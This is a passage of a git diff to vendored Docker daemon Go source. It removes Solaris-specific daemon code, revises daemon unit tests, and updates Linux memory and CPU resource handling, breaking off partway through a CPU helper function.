!sysInfo.MemoryReservation { - warnings = append(warnings, "Your kernel does not support memory soft limit capabilities. Limitation discarded.") - logrus.Warnf("Your kernel does not support memory soft limit capabilities. Limitation discarded.") - hostConfig.MemoryReservation = 0 - } - if hostConfig.Memory > 0 && hostConfig.MemoryReservation > 0 && hostConfig.Memory < hostConfig.MemoryReservation { - return warnings, fmt.Errorf("Minimum memory limit should be larger than memory reservation limit, see usage.") - } - if hostConfig.KernelMemory > 0 && !sysInfo.KernelMemory { - warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities. 
Limitation discarded.") - logrus.Warnf("Your kernel does not support kernel memory limit capabilities. Limitation discarded.") - hostConfig.KernelMemory = 0 - } - if hostConfig.CPUShares != 0 && !sysInfo.CPUShares { - warnings = append(warnings, "Your kernel does not support CPU shares. Shares discarded.") - logrus.Warnf("Your kernel does not support CPU shares. Shares discarded.") - hostConfig.CPUShares = 0 - } - if hostConfig.CPUShares < 0 { - warnings = append(warnings, "Invalid CPUShares value. Must be positive. Discarding.") - logrus.Warnf("Invalid CPUShares value. Must be positive. Discarding.") - hostConfig.CPUQuota = 0 - } - if hostConfig.CPUShares > 0 && !sysinfo.IsCPUSharesAvailable() { - warnings = append(warnings, "Global zone default scheduling class not FSS. Discarding shares.") - logrus.Warnf("Global zone default scheduling class not FSS. Discarding shares.") - hostConfig.CPUShares = 0 - } - - // Solaris NOTE: Linux does not do negative checking for CPUShares and Quota here. But it makes sense to. - if hostConfig.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod { - warnings = append(warnings, "Your kernel does not support CPU cfs period. Period discarded.") - logrus.Warnf("Your kernel does not support CPU cfs period. Period discarded.") - if hostConfig.CPUQuota > 0 { - warnings = append(warnings, "Quota will be applied on default period, not period specified.") - logrus.Warnf("Quota will be applied on default period, not period specified.") - } - hostConfig.CPUPeriod = 0 - } - if hostConfig.CPUQuota != 0 && !sysInfo.CPUCfsQuota { - warnings = append(warnings, "Your kernel does not support CPU cfs quota. Quota discarded.") - logrus.Warnf("Your kernel does not support CPU cfs quota. Quota discarded.") - hostConfig.CPUQuota = 0 - } - if hostConfig.CPUQuota < 0 { - warnings = append(warnings, "Invalid CPUQuota value. Must be positive. Discarding.") - logrus.Warnf("Invalid CPUQuota value. Must be positive. 
Discarding.") - hostConfig.CPUQuota = 0 - } - if (hostConfig.CpusetCpus != "" || hostConfig.CpusetMems != "") && !sysInfo.Cpuset { - warnings = append(warnings, "Your kernel does not support cpuset. Cpuset discarded.") - logrus.Warnf("Your kernel does not support cpuset. Cpuset discarded.") - hostConfig.CpusetCpus = "" - hostConfig.CpusetMems = "" - } - cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(hostConfig.CpusetCpus) - if err != nil { - return warnings, fmt.Errorf("Invalid value %s for cpuset cpus.", hostConfig.CpusetCpus) - } - if !cpusAvailable { - return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s.", hostConfig.CpusetCpus, sysInfo.Cpus) - } - memsAvailable, err := sysInfo.IsCpusetMemsAvailable(hostConfig.CpusetMems) - if err != nil { - return warnings, fmt.Errorf("Invalid value %s for cpuset mems.", hostConfig.CpusetMems) - } - if !memsAvailable { - return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s.", hostConfig.CpusetMems, sysInfo.Mems) - } - if hostConfig.BlkioWeight > 0 && !sysInfo.BlkioWeight { - warnings = append(warnings, "Your kernel does not support Block I/O weight. Weight discarded.") - logrus.Warnf("Your kernel does not support Block I/O weight. Weight discarded.") - hostConfig.BlkioWeight = 0 - } - if hostConfig.OomKillDisable != nil && !sysInfo.OomKillDisable { - *hostConfig.OomKillDisable = false - // Don't warn; this is the default setting but only applicable to Linux - } - - if sysInfo.IPv4ForwardingDisabled { - warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.") - logrus.Warnf("IPv4 forwarding is disabled. Networking will not work") - } - - // Solaris NOTE: We do not allow setting Linux specific options, so check and warn for all of them. 
- - if hostConfig.CapAdd != nil || hostConfig.CapDrop != nil { - warnings = append(warnings, "Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") - logrus.Warnf("Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") - hostConfig.CapAdd = nil - hostConfig.CapDrop = nil - } - - if hostConfig.GroupAdd != nil { - warnings = append(warnings, "Additional groups unsupported on Solaris.Discarding groups lists.") - logrus.Warnf("Additional groups unsupported on Solaris.Discarding groups lists.") - hostConfig.GroupAdd = nil - } - - if hostConfig.IpcMode != "" { - warnings = append(warnings, "IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") - logrus.Warnf("IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") - hostConfig.IpcMode = "" - } - - if hostConfig.PidMode != "" { - warnings = append(warnings, "PID namespace setting unsupported on Solaris. Running container in host PID namespace.") - logrus.Warnf("PID namespace setting unsupported on Solaris. Running container in host PID namespace.") - hostConfig.PidMode = "" - } - - if hostConfig.Privileged { - warnings = append(warnings, "Privileged mode unsupported on Solaris. Discarding privileged mode setting.") - logrus.Warnf("Privileged mode unsupported on Solaris. Discarding privileged mode setting.") - hostConfig.Privileged = false - } - - if hostConfig.UTSMode != "" { - warnings = append(warnings, "UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") - logrus.Warnf("UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") - hostConfig.UTSMode = "" - } - - if hostConfig.CgroupParent != "" { - warnings = append(warnings, "Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.") - logrus.Warnf("Specifying Cgroup parent unsupported on Solaris. 
Discarding cgroup parent setting.") - hostConfig.CgroupParent = "" - } - - if hostConfig.Ulimits != nil { - warnings = append(warnings, "Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") - logrus.Warnf("Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") - hostConfig.Ulimits = nil - } - - return warnings, nil -} - -// platformReload update configuration with platform specific options -func (daemon *Daemon) platformReload(config *Config) map[string]string { - return map[string]string{} -} - -// verifyDaemonSettings performs validation of daemon config struct -func verifyDaemonSettings(config *Config) error { - - if config.DefaultRuntime == "" { - config.DefaultRuntime = stockRuntimeName - } - if config.Runtimes == nil { - config.Runtimes = make(map[string]types.Runtime) - } - stockRuntimeOpts := []string{} - config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary, Args: stockRuntimeOpts} - - // checkSystem validates platform-specific requirements - return nil -} - -func checkSystem() error { - // check OS version for compatibility, ensure running in global zone - var err error - var id C.zoneid_t - - if id, err = C.getzoneid(); err != nil { - return fmt.Errorf("Exiting. Error getting zone id: %+v", err) - } - if int(id) != 0 { - return fmt.Errorf("Exiting because the Docker daemon is not running in the global zone") - } - - v, err := kernel.GetKernelVersion() - if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 5, Major: 12, Minor: 0}) < 0 { - return fmt.Errorf("Your Solaris kernel version: %s doesn't support Docker. 
Please upgrade to 5.12.0", v.String()) - } - return err -} - -// configureMaxThreads sets the Go runtime max threads threshold -// which is 90% of the kernel setting from /proc/sys/kernel/threads-max -func configureMaxThreads(config *Config) error { - return nil -} - -// configureKernelSecuritySupport configures and validate security support for the kernel -func configureKernelSecuritySupport(config *Config, driverName string) error { - return nil -} - -func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { - netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) - if err != nil { - return nil, err - } - - controller, err := libnetwork.New(netOptions...) - if err != nil { - return nil, fmt.Errorf("error obtaining controller instance: %v", err) - } - - // Initialize default network on "null" - if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)); err != nil { - return nil, fmt.Errorf("Error creating default 'null' network: %v", err) - } - - if !config.DisableBridge { - // Initialize default driver "bridge" - if err := initBridgeDriver(controller, config); err != nil { - return nil, err - } - } - - return controller, nil -} - -func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { - if n, err := controller.NetworkByName("bridge"); err == nil { - if err = n.Delete(); err != nil { - return fmt.Errorf("could not delete the default bridge network: %v", err) - } - } - - bridgeName := bridge.DefaultBridgeName - if config.bridgeConfig.Iface != "" { - bridgeName = config.bridgeConfig.Iface - } - netOption := map[string]string{ - bridge.BridgeName: bridgeName, - bridge.DefaultBridge: strconv.FormatBool(true), - netlabel.DriverMTU: strconv.Itoa(config.Mtu), - bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), - } - - // --ip processing - if 
config.bridgeConfig.DefaultIP != nil { - netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() - } - - var ipamV4Conf *libnetwork.IpamConf - - ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} - - nwList, _, err := netutils.ElectInterfaceAddresses(bridgeName) - if err != nil { - return errors.Wrap(err, "list bridge addresses failed") - } - - nw := nwList[0] - if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) - if err != nil { - return errors.Wrap(err, "parse CIDR failed") - } - // Iterate through in case there are multiple addresses for the bridge - for _, entry := range nwList { - if fCIDR.Contains(entry.IP) { - nw = entry - break - } - } - } - - ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String() - hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask) - if hip.IsGlobalUnicast() { - ipamV4Conf.Gateway = nw.IP.String() - } - - if config.bridgeConfig.IP != "" { - ipamV4Conf.PreferredPool = config.bridgeConfig.IP - ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) - if err != nil { - return err - } - ipamV4Conf.Gateway = ip.String() - } else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" { - logrus.Infof("Default bridge (%s) is assigned with an IP address %s. 
Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) - } - - if config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) - if err != nil { - return err - } - - ipamV4Conf.SubPool = fCIDR.String() - } - - if config.bridgeConfig.DefaultGatewayIPv4 != nil { - ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() - } - - v4Conf := []*libnetwork.IpamConf{ipamV4Conf} - v6Conf := []*libnetwork.IpamConf{} - - // Initialize default network on "bridge" with the same name - _, err = controller.NewNetwork("bridge", "bridge", "", - libnetwork.NetworkOptionDriverOpts(netOption), - libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), - libnetwork.NetworkOptionDeferIPv6Alloc(false)) - if err != nil { - return fmt.Errorf("Error creating default 'bridge' network: %v", err) - } - return nil -} - -// registerLinks sets up links between containers and writes the -// configuration out for persistence. -func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { - return nil -} - -func (daemon *Daemon) cleanupMounts() error { - return nil -} - -// conditionalMountOnStart is a platform specific helper function during the -// container start to call mount. -func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { - return daemon.Mount(container) -} - -// conditionalUnmountOnCleanup is a platform specific helper function called -// during the cleanup of a container to unmount. 
-func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { - return daemon.Unmount(container) -} - -func restoreCustomImage(is image.Store, ls layer.Store, rs reference.Store) error { - // Solaris has no custom images to register - return nil -} - -func driverOptions(config *Config) []nwconfig.Option { - return []nwconfig.Option{} -} - -func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { - return nil, nil -} - -// setDefaultIsolation determine the default isolation mode for the -// daemon to run in. This is only applicable on Windows -func (daemon *Daemon) setDefaultIsolation() error { - return nil -} - -func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { - return types.RootFS{} -} - -func setupDaemonProcess(config *Config) error { - return nil -} - -func (daemon *Daemon) setupSeccompProfile() error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/daemon_test.go b/vendor/github.com/docker/docker/daemon/daemon_test.go index 00817bd1b6..43f4f504b6 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_test.go +++ b/vendor/github.com/docker/docker/daemon/daemon_test.go @@ -1,27 +1,24 @@ -// +build !solaris - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "io/ioutil" "os" "path/filepath" - "reflect" + "runtime" "testing" - "time" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/pkg/discovery" + "github.com/docker/docker/errdefs" _ "github.com/docker/docker/pkg/discovery/memory" - "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/truncindex" - "github.com/docker/docker/registry" - "github.com/docker/docker/volume" - volumedrivers "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/docker/docker/volume/store" + volumesservice 
"github.com/docker/docker/volume/service" "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // @@ -30,38 +27,28 @@ import ( func TestGetContainer(t *testing.T) { c1 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", - Name: "tender_bardeen", - }, + ID: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", + Name: "tender_bardeen", } c2 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de", - Name: "drunk_hawking", - }, + ID: "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de", + Name: "drunk_hawking", } c3 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57", - Name: "3cdbd1aa", - }, + ID: "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57", + Name: "3cdbd1aa", } c4 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5", - Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", - }, + ID: "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5", + Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", } c5 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b", - Name: "d22d69a2b896", - }, + ID: "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b", + Name: "d22d69a2b896", } store := container.NewMemoryStore() @@ -78,10 +65,15 @@ func TestGetContainer(t *testing.T) { index.Add(c4.ID) index.Add(c5.ID) + containersReplica, err := container.NewViewDB() + if err != nil { + t.Fatalf("could not create ViewDB: %v", 
err) + } + daemon := &Daemon{ - containers: store, - idIndex: index, - nameIndex: registrar.NewRegistrar(), + containers: store, + containersReplica: containersReplica, + idIndex: index, } daemon.reserveName(c1.ID, c1.Name) @@ -126,17 +118,10 @@ func initDaemonWithVolumeStore(tmp string) (*Daemon, error) { repository: tmp, root: tmp, } - daemon.volumes, err = store.New(tmp) + daemon.volumes, err = volumesservice.NewVolumeService(tmp, nil, idtools.IDPair{UID: 0, GID: 0}, daemon) if err != nil { return nil, err } - - volumesDriver, err := local.New(tmp, 0, 0) - if err != nil { - return nil, err - } - volumedrivers.Register(volumesDriver, volumesDriver.Name()) - return daemon, nil } @@ -158,6 +143,10 @@ func TestValidContainerNames(t *testing.T) { } func TestContainerInitDNS(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") // for chown + } + tmp, err := ioutil.TempDir("", "docker-container-test-") if err != nil { t.Fatal(err) @@ -187,7 +176,7 @@ func TestContainerInitDNS(t *testing.T) { "UpdateDns":false,"Volumes":{},"VolumesRW":{},"AppliedVolumesFrom":null}` // Container struct only used to retrieve path to config file - container := &container.Container{CommonContainer: container.CommonContainer{Root: containerPath}} + container := &container.Container{Root: containerPath} configPath, err := container.ConfigPath() if err != nil { t.Fatal(err) @@ -213,7 +202,6 @@ func TestContainerInitDNS(t *testing.T) { if err != nil { t.Fatal(err) } - defer volumedrivers.Unregister(volume.DefaultDriverName) c, err := daemon.load(containerID) if err != nil { @@ -314,314 +302,18 @@ func TestMerge(t *testing.T) { } } -func TestDaemonReloadLabels(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:bar"}, - }, - } - - valuesSets := make(map[string]interface{}) - valuesSets["labels"] = "foo:baz" - newConfig := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:baz"}, - valuesSet: 
valuesSets, - }, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - label := daemon.configStore.Labels[0] - if label != "foo:baz" { - t.Fatalf("Expected daemon label `foo:baz`, got %s", label) - } -} - -func TestDaemonReloadInsecureRegistries(t *testing.T) { - daemon := &Daemon{} - // initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000" - daemon.RegistryService = registry.NewService(registry.ServiceOptions{ - InsecureRegistries: []string{ - "127.0.0.0/8", - "10.10.1.11:5000", - "10.10.1.22:5000", // this will be removed when reloading - "docker1.com", - "docker2.com", // this will be removed when reloading - }, - }) - - daemon.configStore = &Config{} - - insecureRegistries := []string{ - "127.0.0.0/8", // this will be kept - "10.10.1.11:5000", // this will be kept - "10.10.1.33:5000", // this will be newly added - "docker1.com", // this will be kept - "docker3.com", // this will be newly added - } - - valuesSets := make(map[string]interface{}) - valuesSets["insecure-registries"] = insecureRegistries - - newConfig := &Config{ - CommonConfig: CommonConfig{ - ServiceOptions: registry.ServiceOptions{ - InsecureRegistries: insecureRegistries, - }, - valuesSet: valuesSets, - }, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - // After Reload, daemon.RegistryService will be changed which is useful - // for registry communication in daemon. - registries := daemon.RegistryService.ServiceConfig() - - // After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon. - // Then collect registries.InsecureRegistryCIDRs in dataMap. - // When collecting, we need to convert CIDRS into string as a key, - // while the times of key appears as value. 
- dataMap := map[string]int{} - for _, value := range registries.InsecureRegistryCIDRs { - if _, ok := dataMap[value.String()]; !ok { - dataMap[value.String()] = 1 - } else { - dataMap[value.String()]++ - } - } - - for _, value := range registries.IndexConfigs { - if _, ok := dataMap[value.Name]; !ok { - dataMap[value.Name] = 1 - } else { - dataMap[value.Name]++ - } - } - - // Finally compare dataMap with the original insecureRegistries. - // Each value in insecureRegistries should appear in daemon's insecure registries, - // and each can only appear exactly ONCE. - for _, r := range insecureRegistries { - if value, ok := dataMap[r]; !ok { - t.Fatalf("Expected daemon insecure registry %s, got none", r) - } else if value != 1 { - t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value) - } - } - - // assert if "10.10.1.22:5000" is removed when reloading - if value, ok := dataMap["10.10.1.22:5000"]; ok { - t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value) - } - - // assert if "docker2.com" is removed when reloading - if value, ok := dataMap["docker2.com"]; ok { - t.Fatalf("Expected no insecure registry of docker2.com, got %d", value) - } -} - -func TestDaemonReloadNotAffectOthers(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:bar"}, - Debug: true, - }, - } - - valuesSets := make(map[string]interface{}) - valuesSets["labels"] = "foo:baz" - newConfig := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"foo:baz"}, - valuesSet: valuesSets, - }, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } +func TestValidateContainerIsolation(t *testing.T) { + d := Daemon{} - label := daemon.configStore.Labels[0] - if label != "foo:baz" { - t.Fatalf("Expected daemon label `foo:baz`, got %s", label) - } - debug := daemon.configStore.Debug - if !debug { - t.Fatalf("Expected debug 'enabled', got 'disabled'") - } + _, err := 
d.verifyContainerSettings(runtime.GOOS, &containertypes.HostConfig{Isolation: containertypes.Isolation("invalid")}, nil, false) + assert.Check(t, is.Error(err, "invalid isolation 'invalid' on "+runtime.GOOS)) } -func TestDaemonDiscoveryReload(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1", - ClusterAdvertise: "127.0.0.1:3333", - }, - } - - if err := daemon.initDiscovery(daemon.configStore); err != nil { - t.Fatal(err) +func TestFindNetworkErrorType(t *testing.T) { + d := Daemon{} + _, err := d.FindNetwork("fakeNet") + _, ok := errors.Cause(err).(libnetwork.ErrNoSuchNetwork) + if !errdefs.IsNotFound(err) || !ok { + t.Error("The FindNetwork method MUST always return an error that implements the NotFound interface and is ErrNoSuchNetwork") } - - expected := discovery.Entries{ - &discovery.Entry{Host: "127.0.0.1", Port: "3333"}, - } - - select { - case <-time.After(10 * time.Second): - t.Fatal("timeout waiting for discovery") - case <-daemon.discoveryWatcher.ReadyCh(): - } - - stopCh := make(chan struct{}) - defer close(stopCh) - ch, errCh := daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } - - valuesSets := make(map[string]interface{}) - valuesSets["cluster-store"] = "memory://127.0.0.1:2222" - valuesSets["cluster-advertise"] = "127.0.0.1:5555" - newConfig := &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1:2222", - ClusterAdvertise: "127.0.0.1:5555", - valuesSet: valuesSets, - }, - } - - expected = discovery.Entries{ - &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - select { - case <-time.After(10 * time.Second): - 
t.Fatal("timeout waiting for discovery") - case <-daemon.discoveryWatcher.ReadyCh(): - } - - ch, errCh = daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } -} - -func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{} - - valuesSet := make(map[string]interface{}) - valuesSet["cluster-store"] = "memory://127.0.0.1:2222" - valuesSet["cluster-advertise"] = "127.0.0.1:5555" - newConfig := &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1:2222", - ClusterAdvertise: "127.0.0.1:5555", - valuesSet: valuesSet, - }, - } - - expected := discovery.Entries{ - &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - select { - case <-time.After(10 * time.Second): - t.Fatal("timeout waiting for discovery") - case <-daemon.discoveryWatcher.ReadyCh(): - } - - stopCh := make(chan struct{}) - defer close(stopCh) - ch, errCh := daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } -} - -func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) { - daemon := &Daemon{} - daemon.configStore = &Config{ - CommonConfig: CommonConfig{ - ClusterStore: "memory://127.0.0.1", - }, - } - valuesSets := make(map[string]interface{}) - valuesSets["cluster-advertise"] = "127.0.0.1:5555" - newConfig := &Config{ - CommonConfig: CommonConfig{ - ClusterAdvertise: "127.0.0.1:5555", - valuesSet: valuesSets, - }, - } - expected := discovery.Entries{ - 
&discovery.Entry{Host: "127.0.0.1", Port: "5555"}, - } - - if err := daemon.Reload(newConfig); err != nil { - t.Fatal(err) - } - - select { - case <-daemon.discoveryWatcher.ReadyCh(): - case <-time.After(10 * time.Second): - t.Fatal("Timeout waiting for discovery") - } - stopCh := make(chan struct{}) - defer close(stopCh) - ch, errCh := daemon.discoveryWatcher.Watch(stopCh) - - select { - case <-time.After(1 * time.Second): - t.Fatal("failed to get discovery advertisements in time") - case e := <-ch: - if !reflect.DeepEqual(e, expected) { - t.Fatalf("expected %v, got %v\n", expected, e) - } - case e := <-errCh: - t.Fatal(e) - } - } diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix.go b/vendor/github.com/docker/docker/daemon/daemon_unix.go index 5b3ffeb72d..e2c77610d4 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_unix.go +++ b/vendor/github.com/docker/docker/daemon/daemon_unix.go @@ -1,9 +1,10 @@ // +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "bytes" + "bufio" + "context" "fmt" "io/ioutil" "net" @@ -13,22 +14,26 @@ import ( "runtime/debug" "strconv" "strings" - "syscall" "time" - "github.com/Sirupsen/logrus" + containerd_cgroups "github.com/containerd/cgroups" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/blkiodev" pblkiodev "github.com/docker/docker/api/types/blkiodev" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/image" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/initlayer" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/docker/pkg/sysinfo" "github.com/docker/docker/runconfig" - 
runconfigopts "github.com/docker/docker/runconfig/opts" + volumemounts "github.com/docker/docker/volume/mounts" "github.com/docker/libnetwork" nwconfig "github.com/docker/libnetwork/config" "github.com/docker/libnetwork/drivers/bridge" @@ -36,16 +41,25 @@ import ( "github.com/docker/libnetwork/netutils" "github.com/docker/libnetwork/options" lntypes "github.com/docker/libnetwork/types" - "github.com/golang/protobuf/ptypes" "github.com/opencontainers/runc/libcontainer/cgroups" - "github.com/opencontainers/runc/libcontainer/label" rsystem "github.com/opencontainers/runc/libcontainer/system" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/selinux/go-selinux/label" "github.com/pkg/errors" + "github.com/sirupsen/logrus" "github.com/vishvananda/netlink" + "golang.org/x/sys/unix" ) const ( + // DefaultShimBinary is the default shim to be used by containerd if none + // is specified + DefaultShimBinary = "docker-containerd-shim" + + // DefaultRuntimeBinary is the default runtime to be used by + // containerd if none is specified + DefaultRuntimeBinary = "docker-runc" + // See https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/tree/kernel/sched/sched.h?id=8cd9234c64c584432f6992fe944ca9e46ca8ea76#n269 linuxMinCPUShares = 2 linuxMaxCPUShares = 262144 @@ -53,30 +67,35 @@ const ( // It's not kernel limit, we want this 4M limit to supply a reasonable functional container linuxMinMemory = 4194304 // constants for remapped root settings - defaultIDSpecifier string = "default" - defaultRemappedID string = "dockremap" + defaultIDSpecifier = "default" + defaultRemappedID = "dockremap" // constant for cgroup drivers cgroupFsDriver = "cgroupfs" cgroupSystemdDriver = "systemd" + + // DefaultRuntimeName is the default runtime to be used by + // containerd if none is specified + DefaultRuntimeName = "docker-runc" ) -func getMemoryResources(config containertypes.Resources) *specs.Memory { - 
memory := specs.Memory{} +type containerGetter interface { + GetContainer(string) (*container.Container, error) +} + +func getMemoryResources(config containertypes.Resources) *specs.LinuxMemory { + memory := specs.LinuxMemory{} if config.Memory > 0 { - limit := uint64(config.Memory) - memory.Limit = &limit + memory.Limit = &config.Memory } if config.MemoryReservation > 0 { - reservation := uint64(config.MemoryReservation) - memory.Reservation = &reservation + memory.Reservation = &config.MemoryReservation } - if config.MemorySwap != 0 { - swap := uint64(config.MemorySwap) - memory.Swap = &swap + if config.MemorySwap > 0 { + memory.Swap = &config.MemorySwap } if config.MemorySwappiness != nil { @@ -84,36 +103,40 @@ func getMemoryResources(config containertypes.Resources) *specs.Memory { memory.Swappiness = &swappiness } + if config.OomKillDisable != nil { + memory.DisableOOMKiller = config.OomKillDisable + } + if config.KernelMemory != 0 { - kernelMemory := uint64(config.KernelMemory) - memory.Kernel = &kernelMemory + memory.Kernel = &config.KernelMemory } return &memory } -func getCPUResources(config containertypes.Resources) *specs.CPU { - cpu := specs.CPU{} +func getCPUResources(config containertypes.Resources) (*specs.LinuxCPU, error) { + cpu := specs.LinuxCPU{} - if config.CPUShares != 0 { + if config.CPUShares < 0 { + return nil, fmt.Errorf("shares: invalid argument") + } + if config.CPUShares >= 0 { shares := uint64(config.CPUShares) cpu.Shares = &shares } if config.CpusetCpus != "" { - cpuset := config.CpusetCpus - cpu.Cpus = &cpuset + cpu.Cpus = config.CpusetCpus } if config.CpusetMems != "" { - cpuset := config.CpusetMems - cpu.Mems = &cpuset + cpu.Mems = config.CpusetMems } if config.NanoCPUs > 0 { // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt period := uint64(100 * time.Millisecond / time.Microsecond) - quota := uint64(config.NanoCPUs) * period / 1e9 + quota := config.NanoCPUs * 